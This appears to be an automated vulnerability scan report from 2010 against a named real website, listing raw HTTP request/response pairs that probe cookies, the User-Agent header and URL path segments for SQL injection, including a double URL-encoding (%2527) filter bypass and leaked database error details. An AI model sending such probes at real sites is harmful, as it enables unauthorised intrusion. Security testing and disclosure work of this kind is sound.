apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:37:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/34-gaac-blogs/9-epik-blog.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds/34-gaac-blogs.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:37:18 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/37-ga-support-forums.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:36:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/37-ga-support-forums.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:36:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:36:18 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:36:18 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds/37-ga-support-forums.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:34:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds/37-ga-support-forums.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/feeds.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:34:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=9ade5d490f9099063225dfbefd4a222f; path=/ Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:34:54 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:34:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20961
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Article #0 not found Date: Sat, 06 Nov 2010 08:07:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:07:41 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:07:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Article #0 not found Date: Sat, 06 Nov 2010 08:04:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:04:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:04:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 07:52:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources/healthcheck.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 07:52:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:51:05 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:51:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... ed only to you... You have the option to send your results to us for further analysis if you'd like to discuss consultation to remedy problems found... HealthCheck does retain data about the number of errors found and the severity of errors, but does not retain information about the specific site... When you start a HealthCheck the initial form providing your name, email, and website is recorded and you ...[SNIP]...
Request 2
GET /resources/healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources%2527/healthcheck/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 08:06:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:06:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /resources%2527%2527/healthcheck/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:06:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
